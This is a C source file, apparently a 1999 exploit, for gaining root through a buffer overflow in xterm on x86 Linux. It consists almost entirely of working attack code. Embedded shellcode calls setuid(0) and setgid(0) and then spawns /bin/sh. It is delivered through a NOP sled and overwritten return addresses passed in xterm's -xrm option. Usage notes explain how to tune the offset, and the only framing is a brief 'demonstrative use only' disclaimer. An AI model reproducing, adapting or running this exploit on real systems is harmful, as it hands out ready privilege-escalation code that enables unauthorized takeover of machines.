/*
 
    xterm exploit code for x86 linux
 
    Local user can gain root access.
 
    Tested redhat linux : 4.0
 
    Usage
    $ xterm-ex 0
               |
               +------ try from -50 to 50 ( try in steps of 1 )
 
    This program is only for demonstrative use only.
    USE IT AT YOUR OWN RISK!
 
    Programmed by Taeho Oh 1999/04/25
 
 
 Taeho Oh ( ohhara@postech.edu )             http://postech.edu/~ohhara
 PLUS ( Postech Laboratory for Unix Security )  http://postech.edu/plus
 PosLUG ( Postech Linux User Group )    http://postech.edu/group/poslug
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

#define OFFSET                          100
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[1024]=
  "\xeb\x31"                      /* jmp 0x31       [2000]*/
  "\x31\xc0"                      /* xorl %eax,%eax [2000]*/
  "\x31\xdb"                      /* xorl %ebx,%ebx [2000]*/
  "\xb0\x17"                      /* movb $0x17,%al [2000]*/
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\x31\xc0"                      /* xorl %eax,%eax [2000]*/
  "\x31\xdb"                      /* xorl %ebx,%ebx [2000]*/
  "\xb0\x17"                      /* movb $0x17,%al [2000]*/
  "\x04\x17"                      /* addb $0x17,%al [2000]*/
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\x5e"                          /* popl %esi      [2000]*/
  "\x89\x76\x08"                  /* movl %esi,0x8(%esi)  */
  "\x31\xc0"                      /* xorl %eax,%eax [2000]*/
  "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
  "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  */
  "\xb0\x0b"                      /* movb $0xb,%al  [2000]*/
  "\x89\xf3"                      /* movl %esi,%ebx [2000]*/
  "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  */
  "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  */
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\x31\xdb"                      /* xorl %ebx,%ebx [2000]*/
  "\x89\xd8"                      /* movl %ebx,%eax [2000]*/
  "\x40"                          /* inc %eax       [2000]*/
  "\xcd\x80"                      /* int $0x80      [2000]*/
  "\xe8\xca\xff\xff\xff"          /* call -0x36     [2000]*/
  "/bin/sh";                      /* .string \"/bin/sh\"  */

unsigned long get_esp(void)
{
  __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
  char buff[RET_POSITION+RANGE+1],*ptr;
  long *addr_ptr,addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
  int i;

  printf("Taeho Oh ( ohhara@postech.edu )             http://postech.edu/~ohhara\n");
  printf("PLUS ( Postech Laboratory for Unix Security )  http://postech.edu/plus\n");
  printf("PosLUG ( Postech Linux User Group )    http://postech.edu/group/poslug\n\n");

  if(argc>1)
    offset+=atoi(argv[1]);

  sp=get_esp();
  addr=sp-offset;

  ptr=buff;
  addr_ptr=(long*)ptr;
  for(i=0;i<bsize;i+=4)
    *(addr_ptr++)=addr;

  for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
    buff[i]=NOP;

  ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
  for(i=0;i<strlen(shellcode);i++)
    *(ptr++)=shellcode[i];

  buff[bsize-1]='\0';

  execle("/usr/X11R6/bin/xterm","xterm","-xrm",buff,0);
}
/*                    www.hack.co.za              [2000]*/